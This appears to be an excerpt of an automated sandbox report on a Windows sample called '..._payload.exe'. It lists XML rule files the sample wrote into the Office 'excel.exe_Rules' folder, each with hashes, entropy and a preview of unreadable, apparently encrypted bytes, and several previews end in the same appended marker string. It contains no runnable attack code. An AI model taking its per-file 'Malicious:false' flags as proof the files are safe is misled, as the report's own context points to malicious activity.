                                                                                                                                                                      Preview:<?xml....P............-..a...`R./...].,...]6n...l.\WL_fSc./.=.{.]...V{.....b.M.(l...p[1.^o..E..w.dP?G.@....h.a.4..?^.F..wY...F.X.3...{Bu}...y.%.$c......./.*...l...Q/.......O.e.....g.......Y.8.t.....5f..2!.O.Uf..P.s.S...Ny....ZSU.;...B....8.iL.Jk.X:;>.&B;.).....9;.M<...5.v.@.P...VF.L...?..9....u..d|y..Tv.u.........R2..@.V.:..^..wB..w.^.c....*7!)QE.1...#.;Ol.....b.7...B*...'O.o1O.C.....3\...,.7..v;v...~.... .............C...Fn\...Z...`...g...t.U..>Z .....|S.....;=.....=..:^.>uk.9)p...8..9*..mt.].....A.[D.(...-..L...d+.>.Kc...J..'......Y.U).=.p...&6.Ld.m.7.P..)..$..#.9..O.|.FiA...Us...j..70.s!....\.s.^3...Tc.k.=X..F.>.!...=@.b....{.._4P...._.~(*.....'...+Qvq..Y)Xma._'..W......A..G~.f..R{..`s.QD...'<%..8..(.../Ue.......6p#.".$..?..y....#]J.}....0..`....LS..N..R`...8..]/.<.....HFj.l.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11932v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3566
                                                                                                                                                                      Entropy (8bit):7.9556173723975485
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:P4XSkSXfzYHV+lK5daVbOIMj1g1Ibyj1zR:P4c81+lcmbIJg1LR
                                                                                                                                                                      MD5:0A4656FAC38B20F1B77AF53D50752CAA
                                                                                                                                                                      SHA1:9CFD87E74AD5E82D2300CF4B298FCC038ED502F7
                                                                                                                                                                      SHA-256:3DE8DF019B2976D8EE84DDE894CA0BCC85CB026FE2F51AB0D1707055392E8FB8
                                                                                                                                                                      SHA-512:53941BD49E8976639F07D2FCFDFD2E9704FC536533EF1ACFCA97452F19C0E0D1D8E23FFDD461197BE81A320FB782CF324EABCAEE5A3A168F367A7D16887CA472
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...=..V..n..F...#Y.!._8`...m.g#g.....J.IJ...r.%2v.?L..O.z"..;2..-.<.d...?.....}..._..........@m.....hQ..ZM..v[..`.vu&oF.]Z...\._'...$r....:...t.}.J....z.......{k..K..^.O.....`L..<f..u...O..*...7.@E.J.=...........JTe..@zg.&.......(.@.f..F...T]...?70..VN_..X`FbXRE1..Ax:..t..h.y]oy....._.('=>...|....51\r... a..h^..qh..2dX...s>.T.`..........*...$.{.......T.VF.i.*F.&...@....)...^....!...3...W.b...q~s..%.St._KJ...]?VE{'|.......4.N.(...x..C.5..WW...... .M=..sx..u. ;.Uwm"..-J..]......].. ....e./..c....g...hg.).8..q..^7...qSx....;<.0......a....K.d.:...Jn....`B...G..>se]...o...w.:..E.Z.:.h..Q.c..L......(C=...o...tn.|.Y7.LF~.H.......T..vs..z$-%.od.........PM]d..%.-.....|..G...k....K.......YA'............|.....^.t......t....1*..X..=/ci.1Z...K.Z.M...lx...........#2.6.3..%..L....4.0....:e.h..A........T...T.)G.......-......?#..\G..... ......Ne}q..`....q.*.....f.......V.r..y.Q.Fn..f..6......a':$..........T.\Yn+..k.|....Sb....0..P....ik

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11933v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3677
                                                                                                                                                                      Entropy (8bit):7.947983246701789
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:+N+mHpR3MtsUp6MbTkUI1uFfGIslMjxldJSbOqn6gDpxvvagDU28t9zwd7b0vl3E:IHpR3TCTgYFfvlRIOq67g/8thKU2L
                                                                                                                                                                      MD5:DC682148A5F1435E8CBC659E46071A05
                                                                                                                                                                      SHA1:9CC4FF1ED1FE2C03C40D04E13D21E7CEDF057A24
                                                                                                                                                                      SHA-256:A351448E3EC92591E11855BFAFFCC7B2158B928E0169BA0D42C6644E6CB40B23
                                                                                                                                                                      SHA-512:B93792FBA211F89931263C81F2DECA1C31FBCE3A8C91557714913056AD859F55EA1C955647BB89FFC6DF9F358FCE49F798A821B87BC680E3E9D1CDCE3901A0C3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.. 7!..P.+.i]*V..H...K.h..m......s"<.n_B....a".Al.V..f`Q.jW....}..o:8.[i..e=.-OC....).b..3<BU.....0X."...-}.m...@....>.lAB.-:"....0JD..8.Lg*a....sQA,..cEdL./..,.c......[M.u...^..^.5.D.{.._Y.r.1.y.y..0.I*.hK.7<6.....q...xR.."......X..1....-].K8..0.d..i3....W:.X........[.&..w..>.G.....d.\.oR._....../..n5z......".g..r..(B.v.Bg....wZ...p..T33PO/..<.u.W..t.a.L.?x...R4.P-..........z!.d">....O.....O.P..s.f1M.Y.;.....R..YN.'..9....WU...h.`....ux..<W.y.....x$X..S6...P...~C.:.(5R.......4.._........)...]Q.....u .O..d:!.^...HEB...........RD..,j..i.........~3.WN.|.....1.PfI..>..",.v...[.%J@.....Af.{T.qP87.x+..}.Y...c.<...!>.H/.Z.'.).\.>.y.<|S...K..a2.l.v.d.^.3.R.+g..gY.~.DO.....W...]..op.?.A$.m*.m.".R+......7........0.#..W.k.....4/.......8..pv..Gk..8...v.:....rw1...eh.T.m.?...NmNs..}..E..@G.V=l.|....B......H.0....L..:...z..%.....@.....u..i...g..0jI..R..=.).._.3.L.]*....z....P.|n>DS._d..}?...M M.+Y.D8....@>m..o/!.r~)D.MW..>...=+.E....M.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11939v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):744
                                                                                                                                                                      Entropy (8bit):7.695769628350813
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:zTVUyR7zKEvaHbLZkfpjee0edGgewHbhT/bo78ZXnnl2Pzk4ksrBXuXTWSUdNciD:/VDK6a/ZkRjeFYQmhTDo78ZXn8JuXTVw
                                                                                                                                                                      MD5:1F94DBFABD20CCA1B0CF3DB351446E25
                                                                                                                                                                      SHA1:413253E83DF222B7AA9885D06DC25949402DB817
                                                                                                                                                                      SHA-256:BE5B8937EB65F52EF49AC35B5DDB71F92A1074CA3ED4801FC6996345AA999BFE
                                                                                                                                                                      SHA-512:C7F9DAE9B6E1B5410FB3BA199C9673218BB8E8BD08586E27B06097C6ADD4F8A50B4842D915EF8656CA870A27C26924B66DD8D889033EF03BAE4632D5C92B00B2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.(.y.z...w.....l.@...Q..,..N.(+..nT..J...9....n`>..$..2..J1..'..z.8o./9.*....B..kz...%.H.L..Tj.X..i.6..E.;..<(?l...*...-...~u.T....E.....V.b...u. .MM..XYx.m;n.....t.w....K7W...O...S.c.o:...`M.......kJ..1v.U.~....Z..&.Ag....rT..Tn.ym.$..e..7.*.....>.0......K.1.:4...4..v@.?.e.W......@...\6..L*.6J....N.l<.l......`.e.`.%IZ..D.j,.)g.U8.B.l.w.......aG..>..Wv=.2.t_.o...V...c].%`.`PaW....e6..K.|rnBR8.K.H.p.......].....bb.Y..Z....(BE\..aEdXe....[SLH1...-`..._~>.P1..U...v.W.{>..f..4V..&.<7&....a]...3.v......k..Mm.^%.7W.iF...R. y.#_V...]Z....h......|.F...#.c.b.L8....?...&....K@]....ra?Fw.;.?.p.(.x...g3.5...uc...u..q+7_.R.t.2.....-bF....2mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11950v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1620
                                                                                                                                                                      Entropy (8bit):7.880547565970703
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:A4Ygzog5lMQEM/UUfd8EhHFfj+dmqsrFD:HYy5dBF8qHBj+gqO9
                                                                                                                                                                      MD5:A3DEDCBD7E2E5A9ED8FDE6DC0BBBF7C6
                                                                                                                                                                      SHA1:45CF5A8791BBDDE3D41BA51D999F144FA9F2E58B
                                                                                                                                                                      SHA-256:9223E4D68114E1470894ED4FB7838B3E47F3CDE0152089438DBB4D4D48F93B64
                                                                                                                                                                      SHA-512:6A15CD74E2EBC6336A459480E994857D9B9FD45253027A7BF162205021DE08863502A4F9444F9ABEC89F6784CD5E06EB518612B1D7682453BCAF96A3676DE14E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.`..K..~../.$..{.|.....,......J.........n...n..o...9.E..i..<5.m..D...).8...v......y...ts..f...........i)..@U..S!.n%.~..V.%.{.S....ZcBG..f..[..o.C..68.~E...0y.....=P...\Toc...]\?.=.T.~.v[.@....<....wA.(.),K...K.x..W.K|G..!...X.%1!.S.o......i.Z..K....#...t..{....>..tW.U05..7..c9,QyP.!.....c.\.e..rI......U...._.?+y..]......Vj....pGd.m.pq.d....D2........Q....~....=.;..F\..p.c....jW.VCi.:...]M....i..2A.......XX.......u.G..'.j..zM-..U./.NO..Zd...Q...5...._:..Y..S..c.J;....C[...J.WcF..\H.f.....9HUERV.0..c..Ty... ......;...V...Xf...Ej.R...r2.Z.2..3m.R>.H....{........aK...Yy.[..p.VEN...P....::|f.W...Tqy!..:...lwki.R...Y.......1.../....Q...f...P....S..#.Fd...C..&.[...$.0n..*..st?.....9.N..7..n.....SK..!........r.xd...E..f\2..A....q.....n.9m..e.UN.@"s=..."A...nl.".D.n.....'..Z..Z.....U.wE..1.......x..4\b..Y..d.@rx.`Y....7E.,..}....i...2{....u..y...=...6.........g.2."."..c..J?.;..=^?..Kn.ZH.G..g....dA.t..Zpf.....u...1.Fo.?.7.4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11981v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):821
                                                                                                                                                                      Entropy (8bit):7.736401192014164
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:r0+zGDAOr1WVHPTQD9WIjbCTtsmXXU2bD:rXGD3svUDYybEtvXXD
                                                                                                                                                                      MD5:84FCF8B9AC8AB8956897263EED77EEEA
                                                                                                                                                                      SHA1:48923101CB36BEBD79A04196C0739383D4ACA320
                                                                                                                                                                      SHA-256:B9E9DE6F3A038CE4B58DB3D7407AF434814327133227B98EC9229C040AA28BD8
                                                                                                                                                                      SHA-512:2C9265A52E2E6BBBE7D81CF13538335EEB1A6CCB18BC679854D3A78C6D88F843A3BA1633777908F3AC67EB83520672FA890FE8DEC5943400DDB3A6F154E1AC73
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.|.yO3...r....~..i.8$...wL.u.VhB....s.O...N.b..P.........u:..HE\...w......"1.#.ae.[.|&._.........D...E..Y....{.h..+...^.Y.r\^.G....nU.i{..X."..XN#L..#e.g..P1z..-.N;].....`i.>.......7.Bs.6.....IZ.=w..k+E..-......."hX..Y.86zJ..z...Vs{...6..n..,.....cr.$yC.\p.Y.t..@....e.F.y#.[6...!(."p..c......R...c.4sL.Z.%..x.L&.t.4d.rY...3u...].'.$....md K..~>q...He,............o....9......Y....[....~H.f.*0..v.q.%.....G..T....C..#`..$.Nx.D../)Vjz-.VL.....i>SX..}(y....)}.z.T...^1.^........S.g:lX..TC1....*..%.w-Bw.T.....".{n.jX......6.]..;..Y.....y.\.YB. ).59.D^.7.7.wh...PkG.f...C.]."..RB:..+B....I<..j.[214...gV<..G.`k.>./.h....b.M...M.vp.k...f..I........R.S........hiV.r;....~....s;.(.j...(....k.O...CV.I....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11989v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1034
                                                                                                                                                                      Entropy (8bit):7.791278313673836
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ocvYI6tpISjmOzWo1IPbhYWFTQeHnJ1xIYb3gSTW62bD:1vqn3WosQIJwY8xD
                                                                                                                                                                      MD5:EA5304D09545980F9158CB4ADA51F7D6
                                                                                                                                                                      SHA1:C6A61BF3A81FEEF924CC4920BA25CF99348F3409
                                                                                                                                                                      SHA-256:CBBFAC2DD049557A5D04795D687EE870C4E91E37D5B82652AB8B1F16197CAA68
                                                                                                                                                                      SHA-512:1EFC8DDA2561C60D13812E2963AA1069FC215969B9D76871ABE56D681A913DD46229B08B638F32D6D11F79B48D6CC8B95ED8877BC485BEBCFBD4CCF368A8CA09
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...S.@.....v.s..P_,=.........-_`-...7...i&..M..pPY*.'.......Z%.......sU...]`\..%u"..1u..M.V.....w.d......aP.c{+58..H.........op...?+.....F..c.*.&.>.$..P.....u};.3_.L#.8..d..^.....^..gKt.T.r...t.;.F...J:6A..m.~...#2..v....P.|...?..J...?y..K.7...5.O..7.R...[.].9..i....K^v...j.?4V{\..xdO.&A.....l^.'.lK5.:.~.{........?.#.=.~....U.............4...u.z....e...%...iF_J..<.."...M....~.6MV....Z..S_.QZ..:..q.t..]...ojY+..[.\.n....x...M$.ki\}......A..`;t.`...yRJ......b..?1..^....K....;;M....j....B....N..m.cj..'$.,...$..8.nS.>C.|J...V..`.u..I....|t.Qu.@....E.......V..{.RW..M...]...........)...<D...fq.............;0...... .[.|p..O..P.=...+..1S........lM...{.2.}..O..}.~.<...........Q"....p..|....*.a.eav.[..[.....0^.j..._0Z.%|..|.U.NM.-...oB.k....3I[..k.c.g.].../g...k..sb.5%q..t..ca*...u+K../.7e}.]n.Lk....H.Z........'..)..N..H....{j.........<Rbn~.|IX.........q....Rs.;~S...B.._.?|..Oy..My....Q..f....>.8.`..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120100v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                      Entropy (8bit):7.8352235262065095
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:c8u3iRVMXYP9EQY2sp0nL7G4/lZhcqLAfqiWWnFjUzVMOXU6u8C2bD:8iROHGsKLKqDDWnFjkLX2yD
                                                                                                                                                                      MD5:B82D63D8DC0A94B68C1AE2A0A41D6860
                                                                                                                                                                      SHA1:EBAC2F5BB2C18E8C98363D546DE4C2946736DE31
                                                                                                                                                                      SHA-256:1C6B015C36271C3EC5B8CF449A75F4C30B21A20D954D67E4C621A5C41F31EB6B
                                                                                                                                                                      SHA-512:CE82A981D6027B721A86CCDE896A847AD94678DA1537BDC2D7DE082D92CF16C591A91C58594BFDC3A2216D28DABE0A1469694D4489A9D4D3B07C51ECACCD952B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.<.L5.}.k{.8........zg..E.<.} .Mc.BX.G$...i.&..<.Y..C\.F....E.....m._$.%s....K...K.....U.q%.es......W.,.4#.1...'3.K.RE.=...E.x.z@.s.`AJ..3-.`...qp...%.......^.xR.~VP|Z....x.Fa.!..H..[..^...5a+xw.g....4c...%..[.exo......?<@.......m..i..<..3....z_A.|.....~`.....e...f<D......B1..C...(.:z....x./..R..w.1K....'_....h.".A.....~'..I....]...................0....%kh.cn.V...m1..%...........;.j.4.Q...=..{w6_db.8......|]..}..vr.J..x........X.8.A..C ].3J.n...j..j.1.G...54....4P..[..L.K..#...R...[.g..`..Q8....&0Iqi......}.~.!..}...@E7.&.^s;Q.e.P.J}.......@p..-.L.(...qn&G.w..i.bK.F/-+....Ud....].v.._.jBa.J..!:'..z.t0L.[U.........9.usv^..8e\.z..<..9o{.e4...0gl...t.#dV..1Q......F....K'....B....z0.......D."4:8..<d.3.....A.W.;.a@E...?..H....\.M>g..'....4....w..7......YX...%f.....wG......w..../Gr..FB..."....\....x..o..}.J[.~..A>~.Z....'..L......Q!...Zk...\4vT.!.f.M..>...>.6._.c...z=8.Y......aG....l}..E {.w#9W...6......=....J.Hm..j..d..v8C9R....4..........#

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120107v6.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2514
                                                                                                                                                                      Entropy (8bit):7.923541000772697
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:hEIXDQAp7inB40F63b78wDUS6AZewSQarPLdYSS54wqezbjD:hhXcqinBvI33p4nAZWrlwqezT
                                                                                                                                                                      MD5:8D796FEDD2F45F2398DC9AA5E3E78508
                                                                                                                                                                      SHA1:397AC083C26AC996CB8B4365CEDE3B9CD6869425
                                                                                                                                                                      SHA-256:ECB2257812B1F8A27104BC518A6DFA5E158563E35906E3C15D2534A68CB39A5C
                                                                                                                                                                      SHA-512:2AD1F484591750ED08823C5D1DE4DD5E6B7B9CAC750439D531793B95188F832D51B0BFB5F161A8D60548BD7694AB5D7E27EBCAFEBA49834836D6A03742DF1E4C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml8.5;TQ....|.S..".5..[.a..o...T...\...'aoU.U.j..aP.(...m.S6Z..H8b.j.h.........u.*?..s..8....&C...{*]..Rb9..._`..;.....s.!.R.l..gt.9*...|c.c..'~j.....u..s...Y.NT...6.d!!..'q...g.`...\..:....s....j..p-?...C.s/?TB..3'.].`..^`fmq..k.U..cv..X'.{.:....d.E.$...S.....uK.C....R7.b".}./.v.h...Hy...|...<.....}>a...[..,.:.X..Lc.#.H.:g..4..[.p.=....!...DF.p.&.|.Q.1.jl.!.9:...<.9..Z..S.&.~..C.R.~.I.m......@.Z........T..i......HU.bA.Ue.k...I..u...[U.jjoHyEKy.....k1.<~.}...%.....Y.....s...D......5....n..Cm.>.....:.....(j.#@..KRn......Y.....5........NR...J..%D..f*t.-.5,w.gC.!*R..(....Z...9..........C.I..)....91. .'."2.tj....S.....8.YN1m..K.;.>_...=.[{.n..n.E.u..1......,p.'..n...S..DQ.vI..ooU..a.U.[E...d.Wk.#.;c_....z..k..$._Fp..J^.........:+U.G....{u....4F.v.{.%...8.<P)e..Q..........7.N..8d.d.d>...`.H....\K.ce......va.5.w.&..Bk...>.`d.......F.@SU..X.I.vM.[.......+.z..O...CT.a....ybB....t......BFYI..A..A.'..w..>Od..g.F*/.kO.&_.......h.\1.'~x

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120110v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1346
                                                                                                                                                                      Entropy (8bit):7.842059408631715
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pa5a+H8djTy9gB2foErX3M0esQTpnI62KbUmAasuFqNnFyB9ktvWilI2bD:pan8dS9K2AEwhl9VUZasuKcLktOil7D
                                                                                                                                                                      MD5:A4E22394AF57AC0EFD42A348CC867EB8
                                                                                                                                                                      SHA1:5BEC94D60130B64563F4799B44F28BFD98916CA0
                                                                                                                                                                      SHA-256:EB718F495A9951BB249ECED545B353240ADF452F7DA200A09FA873A12E0F54EC
                                                                                                                                                                      SHA-512:2868A99AE783486D34622201E8121549530B829E3DEC5A3746EDD5778EC946EF108B3C8274020030D32712B668FC0FD357C3B1486A4DD96E15708C44699540EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.BN...o..H8m=A.I ...Rg.e.Dx...^.....h.o.0s.....<.....<&y`.F`..._.f>G..5..(..-;.tK......c D...g.$.k.p.>.m.....7g..O.F,<.k...j....%..x.N.f..~.......J:.l.{...r....5.."..z}..:...r9.'...p.......b........T ..#...gf..U..uq..Rih.Z?.U.(.wf:..g.+)J..yO.~..Hk....S...S5.`....[..:..m..B.`q....-.iV.M..@.'...Hg.L....@Kn.C.n.<.&..%hV`.z.hO.C.H].9.95.M.X.{$...Y+=..f.m.j..i......k".Y.!aG..K..k=.Qi.#..;|2.G/..H.\26..&n[...J{0n...y....6...w...I..3..U..k..../c.^.F.d......D...+G.e.A:..O.Y...MW..TX.......Nh.!.....y..:.,.....d.$../.,...[.../...c...f...D....M.-..+.....R..X.yx...,v.|-....:,./.....9L........1.q..`..N./k.$.f.If .,.f.PQ..<.wW.....%........6...'=.D.....(.V.2~.bf.....h8WcpB......IU...w...X7m. ...Hc...y..........]...)...naHE4.@_..4....5.?u'.....c=.e.I~...8..9...eE....z.#....2.7.n...?=..F..G.%K.cD.X.P....A:l..V.....t.0.s...U.z,.3.....r........IF.(.IC...:...i(.R....<..V .B...G.h...q.5.".J....."..w.1bW..W........b...........H.../6.oQ...3%....%..Y/e

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120112v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1041
                                                                                                                                                                      Entropy (8bit):7.764734324246825
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TanJD69OoVlaJ6RjbwRrtymuhuoCQk7SpOa3wBQ9Yh2bD:WnJyO+lfRjUR5ymuDkLBW9D
                                                                                                                                                                      MD5:4ACA61965B9203BF780BA0863DC632A9
                                                                                                                                                                      SHA1:3468F8187F367A6F33626E52BC7E1E6D4F431B65
                                                                                                                                                                      SHA-256:D4156CF4393B0A7B24541D36313FD4653E4767B425DFDFC338D3332C9019E7C0
                                                                                                                                                                      SHA-512:24BDFE2C326B190D3E297697559B20BCD18FC66D4D81C019B90C889D83A84459D9B495FD4E0011039CB355AF105225E5FB2140DC8A5CC725B54A579C3B2E07D6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmld..}Y..YM+..1....m...,0<.7?&d+r4<.)H.{....A`o..c.,..F..o..m..?..<..sx..7.....o........]I..[.y..\)pUHjN..$.....7>...N.........[!.a.y.+7........V.....K.T..^.7.'..g)...}dDCuB..#......9D..a..([....q..LxL..J.#.....:.T.q...DI9..f.N7=./..yX.6.'....g.(=...G9.E..s..R5mTW.-h.@_.....1C*...M.&..9!.........._K.FmCv.$U...7.}...N.U..F.....@..D.$.D...Y..+.:.e..T........?e.w.d2...9..+&....../...eoP..Tk+z.}.....i.k....1d.n..it...;.N..$.e|Zd..].l< .y...]6.D.....*m$.....g..T.R"B....W_..N.$#.?P.g.....s.."...!e]jOb.n.A.8m....T,bQ.v.{x..va.....B.v)>.....(.A1..y.?c..1..(E{r.!.t.u..x.6...3.JBJ%..m.^W.xL..1...O+...4..#....R.n....z..K"..Te..b...%.^..3.nX.z>.nZ)H.m.'..'0.............F1...PT..b.B......../.....T5].{N...\U5./"'N.(.U>..W..L.P,...ZYS.&..s...O.1.I.S.UO.M.6o.;m..:..#k.y...I...Y..F...W....O\.alb.....m....On....^.B~.77"u.........0s.|...g.B.b..m.....:.e!.c.yY..f6.....Y=...2_n.z..l....0....1t......7..4.?...r.s...>.OmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgj

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120119v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1664
                                                                                                                                                                      Entropy (8bit):7.883254411947157
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:NOmBZFfyW1dbIawQDGd1rB891I0a5VaZpMD:NnZh1dbFDqWMjXv
                                                                                                                                                                      MD5:4200969E182E8638B907544DC9C8ED56
                                                                                                                                                                      SHA1:82869D5E2A400F410052FC97E5CC85E943BC90FC
                                                                                                                                                                      SHA-256:8D6A44B8299154E901EAEED8B3A7E86D872CFCE2D9D76FE18994C8162C10E61C
                                                                                                                                                                      SHA-512:ED4B7566A341EA94D9AB172E61B8926C939C155DD665AD255018F0D965084355ED7551F4F90C45E048365B950DB7BD8AD00EE0C56439E093A152AA0E200826E9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.B.P..B.;.3..j.O..6.-....s.....g.Y.......M.<.....VBlj_.o,.......:..Wcn__./......./Exj....7.f`...6..{.3.Yi;M.:..X7...GP.\.....y29;.b....X%.Eb....Q.W9..yx.6b[..NCd.R.n1*.?.a.W....R1.p.^...vI..$....a\.s..@-.r.NJ.....6..%.&f....lUu..L.*..PF..M.....c.B.$.#.......\6......h.c..Tm.9>.. I....]?.&..sYy..(.9"T\..?....}*...o.Hr........7..L.B^.....:(....V....5.zB.m;y9..ph..Av=..%l......_..8[..i.O4.&...W..Mm.....l...N..po..v.&W..n9w.....0.n.M.s.5...'M#.s.y3.dF.&...,..s..oC.....y..|...)q&L.g4..1.....d....L.[._..]..f....E.8..+.q...(..`.M..F..5!<....f..\A.8bK'.....79...l..U+.;.ZBn.|.1.....3.X......o...ba.......m.;.sY....W.d...HE+.xJI.X......UV..i.&m..^.}_<.<.y.....DD..._....~......d..uG,....W0u.9.]~.F.....n=.H..;_rc.D[6...b9....O.S.D5,..d...(j.P......pv.......`.9..,..A.x....H...?..iJ\.w.Y...n.lz).......a]....,...q.E...`3y.Ht..n#*X..W..Cd...1.%..t..S-^.......x.C..&.j..~]...A(..w.E...q..,.%.yW"]s.$.....,a.cp?1h..a...R........,...<RS.n.[,.){........5X..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120120v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1195
                                                                                                                                                                      Entropy (8bit):7.815231482479948
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:tRnFUrZQFdx46oBg9qfn20Zx2NjwJz3TvvqN04WSnm62bD:trUNYQ60gAfntZkNjwl3TKNdaxD
                                                                                                                                                                      MD5:042C7E04D3C0C24B2BFB1308DD6C9C2F
                                                                                                                                                                      SHA1:3AA8C0BBA77D5D9EA70DBF57810DDB827BC13554
                                                                                                                                                                      SHA-256:B368C2096C4715D905B44D07A476A18140389BB586170082C097D8F8D84D4B96
                                                                                                                                                                      SHA-512:2B47A2EC04577BE11FF86D931AD72D9DE9BD38D5913E3598DB91009157DB451A37BB0093FEEF43CCF2331BFB8F340D750CC4E59DCAA5F1B675CD15AE004CCD04
                                                                                                                                                                      Malicious:false
